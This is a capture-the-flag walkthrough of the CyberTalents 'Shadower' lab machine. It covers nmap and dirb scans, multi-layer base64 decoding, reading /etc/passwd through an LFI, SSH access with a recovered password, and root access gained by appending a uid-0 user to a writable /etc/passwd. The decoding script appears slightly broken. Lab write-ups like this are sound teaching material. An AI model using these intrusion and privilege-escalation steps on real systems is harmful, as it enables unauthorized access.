CyberTalents Shadower Machine Walkthrough

CyberTalents Shadower Machine Walkthrough

CyberTalents Shadower Machine Walkthrough, we will do
Scanning, enumeration, get a user shell, privilege escalation and Capture the Flag!!

Challenge Link:


identify open ports and services, we used nmap Aggressive scan (-A) on all ports (-p-) and speed up with (T4)

nmap -A -p- -T4 -oA shadower

shadower nmap

Found Open ports: HTTP service on port 80 and SSH on port 22


Using dirb tool, We found index.php

Cybertalents shadower dirb

browser it, and clicking available links and view pages source (CTRL+U)


Cybertalents shadower page source

Found interesting text: my0wns3cr3t.sec

It maybe a password or directory or a file!!

Try it as a path :


It is a long base64 encoded string:

Cybertalents shadower base64

Base64 Decode

Trying to decode it, it produces another base64 string, tried to decode the result multiple times but still produce another base64 string.
It is multi cyclic encoding, I tried to automate the process using python script:


import base64

encoded_text = “….ENCODED_STRING_HERE….”
temp = []

while True:
        decoded = base64.b64decode(encoded_text)
       encoded_text = decoded

Got a string: B100dyPa$$w0rd

Notice: remove the binary indicator character and the single quotes (b”)

Keep browsing other links, found LFI vulnerability and We can read passwd file!

Cybertalents shadower passwd file

Get a shell

we can see usernames for that box, user john seems to be the actual user.

let’s try to ssh for user john with the encoded result as password

ssh john@

Password: B100dyPa$$w0rd

Cybertalents shadower user shell

We Got a user shell

Privilege Escalation:

upload script to enumerate for higher privileges paths.

just copy its content to a file, or you could get it from your local machine using scp, http server, ftp, .. or as you like.

chmod +x

Cybertalents shadower start linpeas

After reviewing the result, seems we can write to /etc/passwd !!

Cybertalents shadower writable passwd file

let’s inject our root user.

Root the machine

Create encrypted password using openssl

openssl passwd hackme

Create a user named hackme with the encrypted password we just created with id of (0) like the root id

 echo hackme:1BQF1p1LiZUVQ:0:0:hackme:/root:/bin/bash >> /etc/passwd

Switch to the new user

su hackme

We are root

root@ip-172-31-43-49:/home/john# id
uid=0(root) gid=0(root) groups=0(root)

Cybertalents shadower root

Capture The Flag:

It’s time to win the prize, read the content of the flag file named root.txt in /root directory

cat /root/root.txt

Congratulations, you rooted the box and captured the flag.

Comments are closed.